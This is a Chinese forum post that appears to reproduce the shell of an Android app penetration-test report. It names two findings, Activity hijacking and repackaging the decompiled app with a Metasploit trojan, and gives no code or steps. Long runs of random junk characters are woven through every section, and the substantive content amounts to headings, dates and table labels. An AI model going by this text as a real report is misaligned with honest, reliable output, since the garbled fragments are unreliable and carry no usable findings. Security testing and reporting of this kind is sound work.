找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4607|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
+ B3 J3 h% T& f# V! j; O$ D& t1 L( | O9 j9 Q" J8 M: B' K

: x! g( |, {, @% M" ^ - m( Y7 C3 j+ \) g4 t! q: u' p
: } r0 h3 ^ o( ]+ e7 v- h7 O; U! U " n) E% p! Q8 s

/ j$ b6 t5 c5 }( x6 c% u! N, _. s* ~- H( G. m' T, h. R0 Q* F
: F' Q* k3 \9 V+ @ A9 }: q( R4 l 4 a! j( I9 s+ b% ]2 R$ m! Y

" p8 [9 H) S7 d0 v7 ?' { / W9 z/ z8 c/ U" B! p4 K* l4 c 文档编号:                - R% G6 G: {3 d2 }$ S# D: F P' |; A7 V1 K) h$ Q8 p/ }; {( G

$ h: {2 x, `* w& s2 a0 r8 ~& r# Z! F0 h

; q& Z* [" p. \6 U! R' z# I+ {# n3 P; I' W   + a2 g- o2 l5 o# `7 e( R9 R9 J v# g% j. L+ L

$ X8 L) n- r5 C! ^1 ]0 o 4 @; S7 p# L+ K! D# }! w4 @

1 U7 o. J" Q' E# z7 \# ^ p. \# [9 q% ?( N# w: t   / y, f! U* {* Q - A8 f! F; l2 B" a+ u2 o# z& t

, R2 }; r8 U+ y" R& C 7 H8 X6 {: W2 l$ |

. |. f, S: W8 H8 n; s 9 @/ P+ E) e7 H7 x/ F: T6 w   % d! c; r, Q& @5 n {* W; p& P0 L # q% N6 _$ E" C8 l

" G# C! B1 `- X, { + {4 F9 X H4 Q6 L5 l3 t3 k! d

$ v7 G5 R& h% Z4 N' r% k1 H. i ! I/ |5 f( t: U( p6 A0 F4 w" v9 y   ! z5 v1 O" y% D4 C+ |" B % a, r0 N1 y' g% k/ }

p6 W+ Y6 w" _3 x" V5 H+ P2 `& N+ v8 H8 J

_/ |2 X0 W+ l" J; h. \& I: t1 w- G3 E0 T( V7 d! H. U   ! q0 y4 |( C1 o) N) P- V, |2 P. k3 P! d! E* I$ d# C

/ l/ R1 N4 e" h9 t7 m: H ! ]) h. q: J1 W" j

3 ?% V$ k: i$ E2 {" C5 ^. j) ]5 \0 f* G 某某某APP渗透测试 3 P' i2 o2 Z3 Q* D 9 t& D$ c: s' x; s6 W" R& e- ~

7 F. H* P( |1 Y0 W0 z 4 u1 W" V, V& M. s; l

9 y* y) j1 y& G. K* U) ?! t4 q0 X: E, V) i, a2 i0 j9 C! Z7 r1 V% _+ ?   # ~ p- d$ ^7 v9 [6 x. y + k* E" q: r* a6 u* o

! ~) M, \1 ?% h& a- M) e1 u; W $ P1 v6 h0 d8 F$ m U

8 R) S/ {- {* V) c " j4 e% h% W% A' Z- w   9 q6 j( F6 K( u9 n5 t $ a! X8 }; v7 ~5 ]+ l; z& C1 p) q% h* U

8 m* o% R6 e( H' l. {$ m/ \% d ! q) E( N' [8 F- m4 I( _$ C

* T( R% g6 }; L3 n# I; I ) p6 X8 k6 R0 f5 F   $ R+ L7 r, H: e8 h4 O6 z7 A, G, R2 K! p

3 h8 j v* }7 F" m/ D+ ]% r" N4 M' J! I' q3 R5 k/ c

+ z* J. V3 h! S( v3 d' Z( g" W; i. } s+ |   # L2 H4 h K6 x$ S. e; e ( u5 D$ s8 y O; c2 A

" S# t3 |9 ?, M9 W0 R 9 l' W5 l/ h0 Y7 N$ Q

* V, L( {1 F2 X2 O 6 q: S+ T6 _. C, ?/ q( s1 { 技 术 报 告 . y& h$ P! [3 I( Z! I1 B5 ~ - R5 l$ _1 y( U- o5 x

S6 b% e% r0 h X" T; M + j3 M3 O% ]! w+ p) u# ?

9 Q+ u+ b2 r8 y# y1 S) X! }1 H0 { + C+ I% x1 o2 y! X8 b   9 C$ C. [; c! x* q- k: ]) C/ s * e7 x' j2 k! Q2 ~' @4 ]; M

% l8 p0 E2 h, @& u; d( h0 f& _' [) Z S4 s2 X, m" `6 G4 Z

8 X8 F4 y; j/ _) t, J3 f % h# K5 Z0 K* ]% T1 |# w! R" a% C   # l9 M1 m" S8 X 7 n n) P9 |, M0 y

, y% A3 w }4 b9 g4 K, W- j1 e% h9 ~* Z! A3 j: w ?7 A9 p

" N h9 L n1 M1 T$ v$ h4 B4 q 0 U" J$ K; O7 x' E   + d: I6 z! L9 p. h ) Y' P. K5 [9 T* Q; ^$ Y4 X/ H

) V6 h/ z4 h- e. w/ d3 @3 ]' m/ R8 o1 ~- P& F$ @

+ k3 n* g1 p7 t P+ q% e, c1 F3 L& O0 }9 e/ ?) B   5 `, Y$ U* e, L7 O C) r7 @1 k1 I: b9 q6 o' W4 s. C2 L# a" P. A

& ]( y* z" h, r" j 6 I& ^4 D: d2 ], S( {

; c3 o( h8 u$ d- B ; |. }, t4 N% L8 U7 z& v& y6 F   % o6 h/ u' j3 y$ U: `$ A4 ? 3 o! P @4 J( I. F& @

" U; z% ^2 O) b. u7 S" M6 V" T! K' R* z

% ^4 J+ U1 }' Z 0 D9 j; \; H1 Y$ \& j   & f1 J. u& o* l0 P* |8 A - b2 A- Y$ T' A& b9 a( A

7 K$ g1 B! E- K: H! q 5 T# B6 c" d9 W+ [9 K

# c% u) r( x$ ?; r 1 a2 |( ^9 |) C! G# Z0 i. r0 a   1 E6 t* ]( p* J ' i* Q, [# z/ D

2 W1 m9 o0 Q% ?6 ^9 l9 O" ? 2 R' H5 o5 j* A, ^# h

2 _- [ w4 }; s/ t+ [& i0 ^" f( q! q; p# h( ^$ N7 O   / F9 W5 k6 y& H0 T9 g ( R i: n) U! K) C

# J: M& n9 s& }! y 0 k- `$ U, ?! I2 Z0 L9 n% N

$ V1 x3 w5 ~& C/ @: o ; B& a, W: _/ S   * e& e* N; ^+ J/ I " ~2 G% ]1 U. Q! z" p* s6 Q6 I

4 k& d# K2 I8 Z : u n& m, Z4 j+ p; |

, X: Z" w) V3 C) A8 ?8 v; l4 ~) c. h, E1 ~. R( I5 [9 p   7 Y3 g, `1 C8 G& B8 O/ M " V# p6 v2 @8 w2 g4 J

5 ]/ v7 K- `% k7 j# d ; q' g: _5 I5 I- A

. [+ U0 H0 u8 f3 z * L. {: r! z/ H, w: e& @5 Y4 T   4 g" M0 d* Y2 C3 H" Z 8 p8 u* b3 P, h6 v3 d* L2 L9 e

/ ~5 h( J$ W6 j/ q8 V . r) o5 N P8 [

3 u. z0 |, _: y2 d2 f2 O ' x4 _& l" Y: l" ^% b/ V   ; ]6 n( a- U* p. c; c 0 y3 r/ E' H7 w3 f9 c6 Q: u; [ x

( G3 i/ }. b- }2 N3 F $ j7 U2 `4 W7 ~ }9 P" ^! s

9 G# w4 U. t% Q% Q' O/ W' K 1 @" u9 n; y% ~/ Z   7 U! l! R3 ~# {4 x) y& n& \9 _* z* N: J" ]( m; |/ W

; {" d7 i2 h. Y$ @; C* U& x1 ?* L. p+ K) Y$ x; ~1 j

! [7 Z, R9 t/ E4 t * l% g$ t% m6 z6 e" J, y) ?) R   1 m: _# D) z6 ]) q( {) s& m) }6 E8 b; z4 n0 w6 D2 M U) N

4 X' r; p9 y' E Y- }2 h* r & C* O7 I1 h2 z' Y7 }# q# j" k

% L. X% @' h! l( v+ m, E! [$ c 2 F4 T: K5 Q/ R3 E8 S! [9 B i9 r   , }$ V, B/ L: u. {/ e2 D/ a( m1 r Z( {7 u4 [; Q

4 Y$ O7 B8 g5 l" \& L) N ( T- @3 W+ Q0 d) _" ?* h& [

: k# T: K; P; a; v: j% }3 |4 t9 k. S- E; b5 {   $ Z, [! X+ h6 e/ l X2 J 1 _' N! P5 R: s' o! K3 B8 U

) c3 J2 v4 X, k5 k k# `! K. O( K+ `7 U

: m; l' y0 x5 N) H8 b* ?/ C 4 K& `/ H6 p. ~5 p   1 z' f8 Y; Q4 c U8 \ * E4 E1 T+ a0 ?5 j8 N+ u

/ M5 w0 n; R! I: D6 U3 S6 m 1 n2 }8 z* V4 \+ d: K

! w) s! j% d) p& _ 4 `3 S3 h7 n- Q$ R/ r4 A7 A9 O   , y9 v) b& ?& K$ e/ \& X1 W1 X " Z1 }4 U/ u! Q! q7 O

- t+ D+ s0 a7 m0 j1 o8 f7 C8 Z# ?7 C: [6 |: e5 {

+ u: e0 \# w" S6 d4 | 3 d6 O* m( b f5 t5 M2 ] 二〇二〇年 ) Y: X. q+ f! |' w" {( E6 t V # l; d# _% B' R

0 a5 |$ d& h+ a) s V* a. ?& `! S. j
$ t4 c5 Z- j0 e+ \ 9 \2 a7 S! c; ~ }. F& @2 \
9 [5 C* Y# E; f4 E) ?/ o5 m) g; j / Q4 Q; J* {1 J& L ~* m3 C+ `. [
# A; _2 Q; C* h. t 7 y- A9 A7 ?9 j. f4 s; O
# l a6 G- J+ [' a / b4 |4 o6 i: f$ B7 H$ V2 d
( v. v$ O S% a ! P+ ]- L, L% ~/ f
% }: i2 O" ]: L- } 2 x6 E$ |3 e5 L0 t$ w" x4 b- n
+ a6 i; t& ~9 p' b . @0 I$ c7 p9 |( R: G
# u7 C. A4 s y1 F% j; I* Q: W( A' g9 f K: o7 c0 }

1 ~( V. N, r$ o5 J9 H: l. \ 5 @! g, @, h0 A5 ` O 目 录 1 ?0 ~ t; c8 l2 d" o; i- N ) J, {& W; }1 H: _; x4 d9 o& r/ V

& v# G% B+ @# t) y4 N# V9 d6 A0 v $ h$ d# Q1 h( x5 Y & B& X2 ~1 q5 Q 9 V h& Q4 ?/ {* e3 F! f# b

% v1 w9 v6 ~! i9 V # l* X! W' s( B& F9 t   8 _% y0 i+ y' x% {1 m & T7 P* C7 S/ `* \

- ?) `# s* U$ P3 t' L ' k& n4 Q( T) H! w2 }- J3 y8 a

7 ?" L- e- O. B' e; A8 B; i* T " { J" \( K( D 1 概述... 3 4 q: w' B# ~& W' u- y% { 4 {9 [$ x! `4 H9 P6 f0 k9 z

* t' F, N$ N$ S: S 2 C* j4 Z; a) ^

, c$ ?; j9 f) C7 z" k5 g* R) N& U* y0 O/ S/ w* t 1.2测试时间... 3 ) C" w' h4 f3 R: r% k1 a4 \) Q; L! ?

9 g- h/ N. U% s7 B7 K, R# Q2 D; d8 J$ G: N) ]0 Q4 N+ [! F3 ?9 ^1 K

6 O4 o' Z1 c/ V3 h* p8 N3 f" l ( g" I/ `* J, i' ? 1.3测试对象... 3 ! u# V" i) r3 P' R- ^; `9 y0 `$ E' v- H9 d: W: B

& J( ?" `' F6 C5 W& d% V ( r# ~, A% m" u6 n! v

: U" k, N0 U0 U- m' N/ C, T3 s Y- v* e; q3 ?, c 1.4测试结果... 3 h/ Y8 V0 M% v2 a" S : W1 m7 e- @6 X% p0 [3 A' U

- o0 X4 t4 s7 B " }' i$ F1 n) i) H

: @: u7 E% R, j * K, G3 Q# z& U% P3 w# K; `" d; ?9 ~ 2 检测结果... 4 , b" K- C6 V0 u" `/ Y0 s 9 y, }9 {1 v' n

& s: D D! L0 g9 v* T8 b5 Y B+ E. X- L% }) r2 Q1 ?% [2 M# D

7 o" T8 r; @) t' } 2 r$ \3 F, E2 l+ Q) z 2.1 某某某... 4 ) p2 C" F9 ]5 s% s6 n5 c) W 1 ^" c3 p5 _: A( \: I7 z$ G. T/ ~

+ v* S: |$ Z$ c d+ l 5 C; r4 v& b& }1 `6 P4 [; q, I

' g8 Z6 q4 o4 c( q% v0 f' k * ~7 g. ], Q5 Q8 @6 X 2.1.1检测目标... 4 : W/ L0 i: d$ x3 j# _ 9 m; `$ r6 B, ? C: d

& h3 x9 E- d1 X& z7 X9 u+ a ; T0 z( G7 e* C& o! V2 Y4 `6 r

3 m, G! g' T4 b( Q8 _. e $ ~# H3 H- {5 C 2.1.2检测结果... 4 A: s) E8 ?' N/ F2 j, q! L' K* B( K : w/ }) S- G$ j6 W/ e: f' l0 u* a

I. B& x( n" ]$ K! t" Z# p , P& @& H4 n* c j7 Q

4 _( E3 N9 t$ P- t; `) U; }7 W6 l1 Q6 } % l. Q6 u" h) r" n; I 2.1.2.1. 4 ) Y9 s" k F+ X. f, F3 n , g! c1 f g* ] o

# y- @( D6 I, g8 {! H* R: {8 h & A+ Q- I1 U& M7 D& [! m8 w* _. x

% p% G0 v1 x7 m' c6 O3 Z4 j' y. o$ t1 m! Z 2.1.2.2. 6 8 I+ ^" A# L0 s' t l " r: t% e7 Z$ Q% t! a

! S/ N8 {8 k! u, g * T- @2 |# F( {& U6 X! O- `3 K

3 X0 o9 i9 h' I/ w& E6 b* b ) g* ]( g, H' l( V; {! C 6 P4 n, R, S* p" \% B; S" O) E$ z4 \' U0 E

9 K" P& e! K' T- g. O o & L( N( z0 T. C
9 i" ?! R+ F' @! Q. }% d4 l0 Y) R) Z6 K+ K+ {! s+ y
' z5 U `# Q; o6 Y& t* l + G8 t; v9 U6 t; F" q6 @
6 G5 K; u# Z: } ^9 q1 C! G- u3 K# s* Q( G( S
+ G7 W( v; U$ |) S% u! @, i5 C 9 d1 f9 k9 d4 l

- ?1 O) q7 {- A2 P 9 ^5 V: ~, @( R! e3 L 1 概述 7 G/ x# J# H/ g" J! v: h- z' A6 v 2 j! A" d* ^; e6 f- s

\2 X1 R! |/ i - O3 k7 l! E3 r6 |* i$ C+ I

3 h4 j R E8 x1 f3 k5 ~0 F. l q. h; t8 L( N X/ X; | 1.2测试时间 , h) m, O0 Y3 `& p! _ " k* k$ H+ }+ l( o+ h

2 J. ]5 E+ N6 ?) u$ ?9 G' V. [) M l6 I/ _/ x6 N0 r$ X. w % o% x, H9 O; D, _2 G7 @0 |$ r) T; m. [ w5 E7 |% [2 o/ M# g8 d7 |2 L' R$ H5 Z1 n0 e( v( K, N7 Z. R) S9 b, h% b& L! \2 p) S e$ {' } l* Y% h0 d/ V, I; i; H* o$ j" m( Z$ J8 g9 U5 P" Z8 V3 U4 A+ m$ g4 p) z1 b3 K E0 J6 |; v3 ^7 V# O" h2 A/ H0 e" D* E! N3 c7 @8 @4 K, n' c$ a0 ^, n, x+ P) p; ~. g+ f$ |7 K7 u" w! W' H4 {3 _/ J) |5 S/ h2 Z6 F5 a) p! h a/ W& u( ]& M- X, M j1 r9 p. s) n# ?: f, n+ }5 n; V! W$ n& _, d: W+ P4 _% p, `# Z6 v! ?4 x" }/ P/ V" k, b! @7 V8 f) F+ P; A3 @( [: a/ {' e& |+ E N% Q2 o; T7 ^9 g' m5 Q0 }: o* i% Z2 @& s1 U/ `) i$ z+ p2 [3 T& {4 n& B0 i+ ~( ?6 x. Y' h/ ]- Q) L% Y3 e% s; E. m: p. E1 V: z2 I9 q8 a% O8 w9 o3 t: E: Y- z. j$ L6 }: d( l3 h7 Y7 O/ `5 R4 x- o, \( x3 k
2 N y5 T5 |/ X& x5 ` % X' g) h5 p; s

* f! A1 `: X) n6 Z ' U9 W3 B9 O. D, R$ @ 渗透测试时间 4 a3 _7 G$ n5 @3 b( `1 [" M. M, x" t6 ^ V4 f) I$ F

% q' k4 L" ^* ]3 O X / i! e: ]9 H: U) N
/ u8 w5 {8 L0 p% h+ _ * J2 K" p+ ^4 N4 g* f4 g( y7 z

e; w' V }+ G8 Z7 C : F- K1 L/ A0 {+ F) |7 Q 起始时间 O- ^2 p2 V7 M O4 m2 z; O5 X * _% l1 A1 x. n* o% A- o# }) }

) \" o8 e/ L- F* _/ ~3 d) D V3 }) D) J8 c! e
8 v/ O0 E4 t7 ^& b5 j2 u3 [0 H . @7 U' ~3 w2 R

$ G, L0 [6 y3 G 7 R' F: q' K! S' D3 t; u- z 202046 + W: G0 U- j" k- g) ]: K 8 ]( x7 _; V# B; p

: x" D4 a$ G1 x a" d: p" _5 d + R4 U1 m. U# M. S a: V4 v
# h5 ^$ u) ~% E & E5 M, G9 A7 v' r

$ s" Y1 J* |1 e) j+ k. K! R - g3 F( e& R0 s5 r8 ` 结束时间 , Z/ S8 s5 `; V* T5 \! \6 L5 Q; b, ]* ?; d4 z8 L. u

* t# j0 a) B' M( e( i" w1 ] 2 z N/ w# W- q I, i" @+ _
1 @+ Y1 o7 n1 Q8 M. B) e0 l4 ~$ v9 W0 b( c4 Q' G# z/ {* T+ ?

0 ^9 P" A! t9 ]9 R7 D2 o% I ' y$ t( a) R" P7 Y8 ]/ S 202049 : F% Z* ~$ T, v `* q" M W( {2 Y) J# M) u& a V: M0 C, h! ] V

5 e6 Q- h- l$ }: [8 l* w& q0 C- b, j* B
8 \9 I# Q9 m8 e 6 n0 E3 l6 y0 u+ z; C4 n- G

7 p. G5 ?% y3 I6 Q) ^& ^ 2 K+ F; [( S. e% D; Y- f0 m 1.3测试对象 1 g8 O8 j' N% J6 Z% [6 M; c& f+ \# P2 K; S% V# {% L

2 n0 s1 v! W$ E# {2 o 8 ^! @3 t' u% C. D1 w

3 O6 `$ F5 E; R 9 g' P& X C; |/ r, e' @ 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 3 M+ Y) y6 U# X( R& s6 d) e( z4 N" [+ m* o" P6 n2 {

: E' g/ {+ i/ n& l. _ _. r1 ]' u( ?- \

8 s: o! V/ |# f9 P- C % f5 F, ~3 J0 w/ y 1-1 检测对象 0 ]- h, W( M1 `* T% G' U' G4 Z4 r- r1 Q3 F' m; z1 V0 w

6 e0 K- `: o f! @4 I8 c" v1 v, I2 T$ G 7 g# _8 q/ f6 ^6 t; w, s 2 F4 Q( B8 f; J& I N$ }! ?- p1 D1 C1 |9 y& y1 L1 |# i3 u) a/ n' E! \# o0 s" L7 C2 b9 p9 e9 m' T/ k% d2 X. ?' ^( z4 [2 v" m; B9 n8 F( I" L2 p# ^$ \4 S( o! G+ \; d O8 u/ F9 j, X; b( Z. a% P' @( K* m }% ^- Y) ?! A/ i* b/ S I$ l+ c/ v. K# m: A ^" g6 r* S5 h9 \" s- C7 z' r$ X9 G, x2 x" Y8 k6 k& w6 l9 Q) O. b" ^7 j* H- ?0 z# x! n! f# V7 y/ j" A" j; ]% \( ~4 }, M8 P+ Q4 U C9 u0 R& X: f" g9 a# s0 O9 Z9 J+ n" k, t7 a% X: G O! W( Z" b5 O. j+ p: a9 ]( n& } g* r: [7 V d1 X- e5 ^) X- h# V; w+ w' G5 R8 ]# E- _8 M, n* I: N% b- B1 o% T! n7 `: F3 E3 d& k6 L7 f* s0 J/ y9 i% W, `0 v; w. G3 v/ G, U- g. [) T' q% D, \) v& I! }3 t( ^& p9 C% q5 X% v- s; n2 n, o3 y* z0 v! K) k# P. p, t1 a! r2 @9 x8 e4 H, Q' h' d6 `0 R$ A& q# X3 L! ]0 z4 h8 D$ n. q) ^7 W) [3 m; E* i. ?' w4 r
& }! `; a4 t1 m9 K) K5 @+ U: w + x( s1 F" c1 {$ U, M2 W. x

8 D2 i; b) g- ^) r) [ ; ?- F0 c* @; H8 A- k" B 序号 * ]: ^' i9 f k 3 D z1 U& ?1 O

, g" U0 ~/ L; j( B0 Q) v* B/ @9 L1 W7 H$ a" S
8 H; H8 V6 Y" h8 }0 [) R7 j 7 q) B5 F2 h# z3 N

- e6 O8 K; ]* t3 \ / h6 S+ N5 N6 _ 测试对象 & t y! o" _1 [8 Y 1 w- A& P4 ^; r) w# p

' E) O) f; V( \7 K0 ]- s 9 |) Z; W8 h6 {% o9 f
6 D% z9 S8 q) M- a+ Y 7 r- B1 F }& Y3 U% H

* c' ^4 @# ^; A/ R Y + [( s* Y; v7 @ 测试地址 0 o! F# l% H5 P6 _9 n2 b+ y& `6 A7 i; K) N

2 g0 N7 y2 y4 B7 s0 n* z- |" ~) j! N- S- ^
2 B! J: Y% @+ o$ U. {; ]# u6 {" t& g# P* E$ c0 E

/ [9 X0 V! S! l" ^6 x 9 K1 s! P, L* i) H: D 安全漏洞 8 {' \) b9 o) D- I* R3 ], N$ q2 m3 y* q- O' o

3 z. G" y2 Z4 O8 A3 S) Z% ^# T2 ]+ T/ C# }* J
# V2 t- p/ \. G$ G) L ~" m | & ]# m% g' [/ j8 j T0 P

, ]0 K1 L7 K7 b+ H/ w6 H " y% u5 i, M j, w4 Y D 1 & v2 o9 W! u/ A: E3 Y" }2 e% \6 J8 h, Y; ^- t1 F: H

% i+ x, Y2 @' O# z \! G4 @0 L6 u* T' s
& z) d3 g/ c$ U$ c! a5 k1 ?6 Z ]4 O6 c3 s! g0 s8 [! ?

O2 @ n: {2 G" l( b# F9 e 9 e; z4 Q9 h. s% r 某某某安卓APP 4 F' Y! \* Y2 O7 w: I% d: ]1 M

/ k1 ?$ J \, Z. Q, }( w+ ~3 _) V7 d
4 A. }5 @2 p0 x$ L $ e2 a- f. J9 B8 e1 O! e7 I8 F2 [

% k: v$ U. ^ g6 C9 N8 i $ j! k; d2 j8 y   / p$ w/ d) f. e3 |. @ % u5 i7 f: K) M: l; J

h5 w0 L* _) |8 a5 o3 J8 z1 U) U# A + _0 C% c: Y! N9 y8 u: ?1 X
3 E5 |$ |4 W6 w* d$ }3 N1 s) Z' D ( C5 z; x; W8 x& [3 \" N

% A# P; K! x. t9 a7 c$ [& E1 L. c% H5 _8 Y/ @5 E: K" y) m 2 0 J) L; a2 J% {0 J i- c o: |+ c: ?, o5 A/ p% f+ L$ q

, O! N% I6 N8 b. _* ^* @: c ; g& O& ^7 U+ v+ _( m; x& }
' \6 y' ?* R( G5 c h5 l& @: y& L. o ( T1 p' l+ r& R' Z

6 t+ H. v: h8 r% o8 j/ K7 h ( N& q! ^+ n7 Q5 ]$ X2 R 1.4测试结果 - A. S0 W( c' w: i, K2 v 6 K% [( t; O8 _7 ^/ V1 ]

7 z9 n. d3 U" R( T $ ~/ a# t, N: q' k7 L

; j) N, I9 _* x : O' o3 A- S! [0 ^ 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: . W. g, {% v9 S- Q; i/ h9 k# b 6 S5 R9 A: c) p1 r" R9 W2 g, g

6 T2 w: M" q3 S, m4 f 1 d* u( E2 ^. {/ v _

1 D3 j) c' A' n; Z* z; s 2 @1 x9 {$ S8 m) X: l" ^7 \   1 b+ ^& h4 a/ g+ q( w1 Z $ y* q% U) r- A/ l5 p

4 e' X; o$ Q* j- G $ }' Z$ ^ H; |0 S& ]; z
+ }& p: t @% s9 F% p7 M1 W1 j0 X1 S+ D& n1 P2 k5 J 7 l M& @: {. X9 m* x) W! K4 P# k8 E8 \8 r$ s9 N# V1 _9 l1 a& V4 X- e( t2 A. ?/ S. ^2 S7 f% L/ L6 {+ a4 J9 ~ I, l' [4 j, \& V" C3 n- k& j# i; O3 z, \/ D% q/ ~4 @, R# P; M- ~; J; S2 c# F% j# n6 j9 V# w# B- s' y7 Q0 X/ @6 F2 g/ {; l- [+ ~ y! _* u0 @2 @, W: ]1 c3 X& t0 g4 M: K" u( ^8 T) g- c1 s" Q6 x5 u6 t0 f) H9 J) R6 f' m- a+ k) x) D/ v$ ^; h$ p8 S2 c5 j5 v; P" _4 J- N$ y. I8 \) ~' |3 d% B& X& W. ]# I8 b7 Z1 b8 i# W1 w @5 G- p" ~* Q( L( q, I8 | z1 I* g2 n8 J; `2 J, P7 i) t. x2 O' q" G4 ~. s; w5 M( {7 Z) g: P( D8 Y: B6 _& U2 h& \7 v [0 @6 K: i: j; R, }; g' H" j( d3 e% a! n V- f9 D$ B- R9 l" }1 P( M8 A/ v* w$ A8 \* i n( w5 p) z" T) O* F6 }' R0 O3 k) c3 s2 {4 p; r; Y& }2 _9 N0 o3 l8 d. ^8 c& ~# f- Z4 N6 B7 R4 ]6 Q/ K- p- |0 l, y8 ^% \2 W* d8 Z p+ \) `3 O0 }3 h9 r6 Y' ]* V! d) N% t) k6 W, p6 |* R& Q: d; V2 k6 L: m0 m; j! S5 r3 b. w0 M( p( h& D a8 T7 S: g8 h+ Z- e! W" h" o1 T1 {9 c& U* \) i( N2 l& o- X9 E" O" S- h$ a3 ` \7 f; l( J4 n. o" ~7 t. s2 V! U3 U( i! z7 S% ^4 X' o# b1 D5 \7 k# C. x; |6 j. H# |$ K( y" K# A5 |2 O4 _# B1 {5 X4 f0 B' W, B9 d5 w# \: c, m) T7 J3 C% ^5 Y, N8 c/ z, X5 c* U. K$ B& q% E: u" K. x; l9 Z+ N" a! k D1 r+ o. m. W* E3 O8 s9 `0 K
5 \) G, a, c6 x2 K" M1 M0 O% G5 ^8 i1 i/ Y

" l; t1 s, k8 w5 b# P $ t: @* }1 X4 q! v$ H( n" k 序号 r# V4 p ?* o$ ~. _5 u7 s4 P9 k" N6 g

( N W' x: h, l* l* X6 |4 q $ M' d, w6 C9 j& ^0 _9 R
; G ~/ U1 ?2 B" _. u. V ) V4 a% @% l% h- u

1 W, k/ Y4 z0 |2 f8 H7 _* }! H" _9 y4 m# S7 o0 C2 k+ J 系统名称 . w- i; v: @* K- S4 ]2 Q+ }$ k+ r

$ Z2 Z* Z$ R* z& b8 X8 Y* O' u9 g9 l3 Z, u6 ^3 Q
" v) t5 y+ O3 ?" {( I 8 x+ r3 L5 O, Y' m% }

' p, c: Y9 E% P! @. b: o' h7 ? * X9 S P2 y4 k* |# G 漏洞名称 . s+ d8 [+ ~6 P & Z9 E* ` `# F7 a6 n1 z+ g. s

$ X0 [* o6 t$ k* Z7 e# n L _ & \' b) T" g$ b4 V/ z: _
; U0 Z0 p! z) U( e 6 i# T/ `6 `/ N( e4 ]9 o' a1 U. V

: @/ x7 t- r2 y& v & d0 k5 s2 R2 q$ ? 漏洞危害 / k! i! y+ M" B0 l ! q7 k0 K# d3 g

$ a3 u$ X. Z j2 c9 R( z+ F # F% r, t$ j0 p$ F' B
( c" {2 r& O3 M: X6 n6 f, n* h ! I8 P4 l) Z% v0 q n

. {0 D+ [6 z! T _1 n5 t $ j) q8 M# \3 U' z 修复结果 " d% h6 E# n! c& y1 R+ o$ Y( @ ) C8 O9 s9 o3 j- N" q* L

0 f( C% C d) D, y( f - @/ y0 ?6 I/ g) k6 z! }3 \
8 f" D! Y7 q! Y, A$ W) v , s1 e( x: R( q9 v8 g% r" I# w

7 s5 {. ^) |* V: |- p* l1 Q/ D9 Z! b) n 1 , @7 m/ X" r# ^# W$ H7 p : _8 |$ h, T# g1 _

3 X# G+ S; W, V1 k& r6 ~8 c: l ( X' P- B5 W6 z7 P% n) F2 X7 L
; d$ y& Q" [$ e 2 O' |$ \9 o v7 R

6 N2 X6 B" U# i* ?8 b# s# @8 L 3 u5 x% \; s( N* e4 v0 p 某某某某某某APP 3 j, f0 y7 M* W2 D1 q0 G ' q0 T* b, F. Y! m) `1 q

6 L% z" M/ d B& A k; W* Y% `0 R0 w$ x$ ]4 I
* X5 Q# ?8 \( N# y' k- h r7 E Y2 Z! Y B) z

, R' _5 r3 w* a/ R2 t " R: g) d$ ]7 ~7 q' [; f' g Activity 劫持 & Y9 j* c* j8 b$ b8 [- H/ j0 V * u4 A2 g( A, w, E) Y6 v. [

; M! n+ Y; c7 G$ u* q0 P : K. }. ^5 {! `% y* p/ l4 t& L# V+ p

3 l; l* i5 R# O4 f1 a 8 Q! U8 E4 v8 W   + e& w6 j! l/ b& L 1 E$ B8 ~5 j% C+ x$ ^) G; s+ C

. A" _0 {" z2 l) n2 W3 r9 Y. J, j m* B& g7 }
3 N+ o$ h! v/ S% P+ i' C1 y! h 4 P9 w0 o& \! T4 y

7 [! \. w/ X# Y- L3 r7 o" R! _ X' f- S" G5 H& ^ , ~% g- D3 x! u; _& Z1 V 4 a7 Z& X i& }" h4 y* q! p5 L) J

- Y" ?( ~! X/ q& z: \& k6 ]# x. e" m 3 h& T7 l& ~ b9 Y9 ~
" i2 i$ r$ D @+ x$ F5 R4 v* `) y% g1 H1 A 1 t3 }/ o s6 z- o# M- R9 w3 _

) P& ?1 U0 c) P- E+ B, L4 s # k2 L3 U1 e2 g# U" p   ) j1 i* {+ ?) e- |6 D $ b* c4 w' }1 H p' o- v( s+ I4 o$ \

1 R( o1 d2 m; x3 j& E 7 X) A. c7 Q) }( ?) B& K+ P
3 s9 k5 |3 I0 V$ Q* M # r% q5 C9 O! m5 Q

! F, S$ M. J) p% q: U5 {# k( B 0 E9 F) H3 S# p" X 2 9 ]5 c7 A0 f$ } # D- J% P- n0 k+ A/ S# F

5 o! n- W# r1 z9 R 8 z! l- m( j% H# F+ ]
4 G- A% o6 S* y ' C2 ~$ O- i, w( _

) c4 L( A" h P" z9 q8 q( q" E5 q) x, p- l9 n 某某某某某某APP 7 s2 L8 [% l1 S: {+ {& [+ y6 o% { y" n" D- {4 ^

# h( ?; e5 H& j) y! } 1 k+ U* d* K+ i7 S6 D
9 E" j* h: P" V" N ) l" t- M7 q4 H, s: u9 M' l$ g

. @: v V1 E+ b( O# T* H : u) o$ a S4 h+ s! }" W7 J4 M+ c 反编译二次打包捆绑木马、篡改APP代码 + k$ W. D; E; y7 A3 |: E( k7 [3 H3 R `; F

9 j; Q. ^6 s% A* f5 { Q - G: ^0 w+ L0 T+ K: w) }) g
% ?; l! o+ ]1 A+ j8 n" ]! ?4 j6 ], x! O$ b

8 {1 N( Y9 B% Q9 i - F4 E; w8 L0 V+ p1 t ; E1 l& d& y5 ^& e, f6 N( O ' q3 h1 o' V" V, k$ j

4 q$ X* |, B; t1 p ! \# v0 G& ^7 S5 z) ?5 u' s
3 G7 |- A) k. M2 D: u 9 {% f6 k+ |. Z. ?4 Y3 {9 w" K6 P

0 F& W! v# _3 G( M; Q' M( w A+ O2 |8 d! Y+ g- T! I   2 @* N1 C; |$ \ 4 H" |. u* {. @, a( i* s

( C" c& M9 V/ K5 `& {+ C7 d! G6 f( b 9 T' w5 O& q c" I& E; F
$ G. A/ S1 H j. R! B, L8 W# Q- R( a3 d G
# q; u" v; E0 f+ E. z1 ^ 3 j% ~: P4 v) h

